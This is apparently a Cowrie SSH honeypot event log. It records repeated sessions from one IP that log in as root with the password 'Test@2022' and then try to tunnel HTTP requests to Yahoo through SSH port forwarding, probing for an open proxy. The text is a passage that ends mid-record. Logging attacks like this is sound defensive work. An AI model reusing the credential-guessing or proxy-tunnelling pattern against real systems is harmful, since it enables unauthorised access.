{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.340801Z","src_ip":"213.209.150.239","session":"bed33f6d0c52"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.389027Z","src_ip":"213.209.150.239","session":"bed33f6d0c52"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27485,"dst_ip":"1.2.3.4","dst_port":22,"session":"46043e358d0d","protocol":"ssh","message":"New connection: 213.209.150.239:27485 (1.2.3.4:22) [session: 46043e358d0d]","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.444572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.446169Z","src_ip":"213.209.150.239","session":"46043e358d0d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.503471Z","src_ip":"213.209.150.239","session":"46043e358d0d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.786922Z","src_ip":"213.209.150.239","session":"46043e358d0d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":24984,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:24984","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.844998Z","session":"46043e358d0d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:32.901822Z","src_ip":"213.209.150.239","session":"46043e358d0d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":31069,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31069","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.055589Z","session":"46043e358d0d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.112436Z","src_ip":"213.209.150.239","session":"46043e358d0d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.170965Z","src_ip":"213.209.150.239","session":"46043e358d0d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27528,"dst_ip":"1.2.3.4","dst_port":22,"session":"db6f460c70f4","protocol":"ssh","message":"New connection: 213.209.150.239:27528 (1.2.3.4:22) [session: db6f460c70f4]","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.217090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.217984Z","src_ip":"213.209.150.239","session":"db6f460c70f4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.264979Z","src_ip":"213.209.150.239","session":"db6f460c70f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.500424Z","src_ip":"213.209.150.239","session":"db6f460c70f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":6449,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:6449","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.548826Z","session":"db6f460c70f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.595990Z","src_ip":"213.209.150.239","session":"db6f460c70f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":11650,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11650","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.733660Z","session":"db6f460c70f4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.780878Z","src_ip":"213.209.150.239","session":"db6f460c70f4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.828821Z","src_ip":"213.209.150.239","session":"db6f460c70f4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27578,"dst_ip":"1.2.3.4","dst_port":22,"session":"842f7d1416ad","protocol":"ssh","message":"New connection: 213.209.150.239:27578 (1.2.3.4:22) [session: 842f7d1416ad]","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.884123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.885031Z","src_ip":"213.209.150.239","session":"842f7d1416ad"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:33.941726Z","src_ip":"213.209.150.239","session":"842f7d1416ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.223979Z","src_ip":"213.209.150.239","session":"842f7d1416ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":18844,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18844","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.281724Z","session":"842f7d1416ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.338354Z","src_ip":"213.209.150.239","session":"842f7d1416ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6714,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6714","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.495099Z","session":"842f7d1416ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.551886Z","src_ip":"213.209.150.239","session":"842f7d1416ad"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.609502Z","src_ip":"213.209.150.239","session":"842f7d1416ad"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27619,"dst_ip":"1.2.3.4","dst_port":22,"session":"28ac2113deb9","protocol":"ssh","message":"New connection: 213.209.150.239:27619 (1.2.3.4:22) [session: 28ac2113deb9]","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.655716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.656356Z","src_ip":"213.209.150.239","session":"28ac2113deb9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.703719Z","src_ip":"213.209.150.239","session":"28ac2113deb9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.939126Z","src_ip":"213.209.150.239","session":"28ac2113deb9"}
{"eventid":"cowrie.session.closed","duration":31.73670744895935,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.986607Z","src_ip":"218.17.175.145","session":"57c244888e62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":18861,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:18861","sensor":"my-vps","timestamp":"2025-08-26T01:03:34.987327Z","session":"28ac2113deb9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.034543Z","src_ip":"213.209.150.239","session":"28ac2113deb9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18963,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18963","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.169507Z","session":"28ac2113deb9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.217338Z","src_ip":"213.209.150.239","session":"28ac2113deb9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.265543Z","src_ip":"213.209.150.239","session":"28ac2113deb9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27667,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffcb63b63c60","protocol":"ssh","message":"New connection: 213.209.150.239:27667 (1.2.3.4:22) [session: ffcb63b63c60]","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.311535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.321973Z","src_ip":"213.209.150.239","session":"ffcb63b63c60"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.359418Z","src_ip":"213.209.150.239","session":"ffcb63b63c60"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.594775Z","src_ip":"213.209.150.239","session":"ffcb63b63c60"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":24184,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24184","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.642841Z","session":"ffcb63b63c60"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.690111Z","src_ip":"213.209.150.239","session":"ffcb63b63c60"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16858,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16858","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.825516Z","session":"ffcb63b63c60"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.872761Z","src_ip":"213.209.150.239","session":"ffcb63b63c60"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.920567Z","src_ip":"213.209.150.239","session":"ffcb63b63c60"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27705,"dst_ip":"1.2.3.4","dst_port":22,"session":"338cc8526cb0","protocol":"ssh","message":"New connection: 213.209.150.239:27705 (1.2.3.4:22) [session: 338cc8526cb0]","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.976445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:35.977097Z","src_ip":"213.209.150.239","session":"338cc8526cb0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exc